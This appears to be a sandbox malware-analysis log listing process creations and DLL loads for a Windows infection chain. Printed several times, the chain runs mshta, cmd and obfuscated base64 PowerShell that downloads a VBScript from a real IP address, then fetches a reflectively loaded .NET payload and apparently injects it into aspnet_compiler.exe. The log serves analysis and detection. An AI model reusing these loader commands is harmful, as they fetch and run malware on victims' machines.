Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
